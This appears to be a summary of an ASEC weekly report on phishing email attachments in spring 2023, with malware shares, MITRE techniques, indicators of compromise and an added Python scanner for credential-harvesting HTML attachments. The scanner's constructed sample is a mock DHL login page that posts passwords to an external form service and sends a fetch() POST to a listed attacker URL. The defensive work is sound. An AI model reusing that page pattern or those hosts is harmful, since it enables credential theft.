ASEC Weekly Phishing Email Threat Trends (March 26th, 2023 – April 1st, 2023) – ASEC BLOG

ASEC tracked phishing email threats for the week of March 26 to April 1, 2023, focusing on attachments and detailing distribution cases across FakePage, Downloader, Infostealer, Backdoor, Worm, and Trojan variants. FakePage was the dominant method (59%), accompanied by loaders like SmokeLoader/GuLoader and infostealers such as AgentTesla and FormBook, with Korean-targeted cases and a highlighted “PDF Online” keyword guiding caution. #FakePage #SmokeLoader #GuLoader #AgentTesla #FormBook #DHLExpress #FedEx #PDFOnline #C2

Keypoints

  • The report covers phishing emails with attachments distributed during March 26–April 1, 2023, excluding cases with only malicious links.
  • FakePage attachments accounted for 59% of incidents, involving mimicry of login pages to harvest credentials.
  • Downloader infections (22%) featured loaders such as SmokeLoader and GuLoader.
  • Infostealers (7%) like AgentTesla and FormBook were observed, stealing credentials from browsers, emails, and FTP clients.
  • Other malware types detected include Backdoor (4%), Worm (4%), and Trojan (3%).
  • File extensions for attachments included HTML/HTM/SHTML for FakePage and ZIP, 7Z, GZ, IMG, DOCX for other malware.
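As an added defender-side example (not code from the ASEC report), the following Python scans an HTML attachment of the FakePage kind described above for credential-harvesting forms and script requests that post to external hosts, and matches those hosts against the indicator hosts listed in this report. The sample attachment, the `IOC_HOSTS` set and the reason labels are constructed here for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts taken from this report's IoC list; extend from your own threat feed.
IOC_HOSTS = {"formspree.io", "naturaverdebeauty.com", "192.185.224.69"}
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")

class FormExtractor(HTMLParser):
    """Collect <form> actions (with password-field flag) and URLs in <script> bodies."""
    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "password": bool}, ...]
        self.script_urls = []  # absolute URLs referenced from inline JavaScript
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive here as raw text
            self.script_urls.extend(URL_RE.findall(data))

def analyze_attachment(html_text):
    """Return (host, reason) findings for an HTML attachment; empty list means clean."""
    p = FormExtractor()
    p.feed(html_text)
    findings = []
    for f in p.forms:
        host = urlparse(f["action"]).hostname or ""
        if not host:
            continue  # relative action: stays on the hosting origin, not an exfil POST
        if host in IOC_HOSTS:
            findings.append((host, "known-ioc"))
        elif f["password"]:
            findings.append((host, "password-form-external-post"))
    for url in p.script_urls:
        host = urlparse(url).hostname or ""
        if host in IOC_HOSTS:
            findings.append((host, "script-url-ioc"))
    return findings

# Constructed sample mimicking a DHL-themed FakePage attachment (not a real capture).
SAMPLE = """<html><body><h2>DHL Express</h2>
<form action="https://formspree.io/f/EXAMPLE" method="POST">
<input name="email"><input type="password" name="pass"><input type="submit"></form>
<script>fetch("https://naturaverdebeauty.com/justld/next.php",{method:"POST"})</script>
</body></html>"""
```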

MITRE Techniques

  • [T1598] Phishing for Information – Used as reconnaissance via phishing emails to obtain credentials. “Phishing for Information (Reconnaissance, ID: T1598[1])”
  • [T1566] Phishing – Initial Access – Employed to gain initial access through deceptive emails. “Phishing (Initial Access, ID: T1566[2])”
  • [T1534] Internal Spearphishing – Lateral Movement – Leveraged spearphishing within internal contexts to move laterally. “Internal Spearphishing (Lateral Movement, ID: T1534[3])”

Indicators of Compromise

  • [URL/Domain] context – https://formspree.io/f/myyazkbv, https://naturaverdebeauty.com/justld/next.php, and 2 more URLs
  • [IP Address] context – 192.185.224.69
  • [File Names] context – ParcelDocumentDHL.htm, 24_153_IBXX 2307_54210_project order.htm

Read more: https://asec.ahnlab.com/en/51222/